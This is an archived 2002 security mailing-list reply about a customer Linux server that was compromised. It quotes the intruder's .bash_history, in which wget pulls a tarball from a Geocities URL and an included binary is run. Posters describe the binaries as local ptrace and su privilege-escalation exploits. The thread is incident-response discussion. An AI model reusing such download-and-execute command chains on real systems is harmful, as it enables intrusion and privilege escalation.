On Mon, 16 Dec 2002 13:47:28 -0500 Damian Gerow <damian@xxxxxxxxxx> wrote: > On Mon, 2002-12-16 at 12:38, Damian Gerow wrote: > > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote: > > > I've just received word that one of our customers was rooted, and he's > > > asking about the file ".haos". Nothing rings any bells, has anyone heard > > > of it? > > > > Just a quick update to this... > > And one last tidbit... > > Left in the .bash_history was this: > > w > cd /tmp > wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz > ./epc > > A quick check tells me that 'epc' is a backdoor utility, and the other > file contained within loc.tgz looks like a trojaned 'su'. No, for me this looks like: epc -> ptrace local exploit su -> su local exploit They're old shit, and i guess your system wasn't updated. > > I've already notified Geocities abuse, and haven't heard back from them > yet. > Good luck, -- Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com> Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA 0665 A341 D4A4 4B5E B579
Attachment:
pgpKX9143eOiP.pgp
Description: PGP signature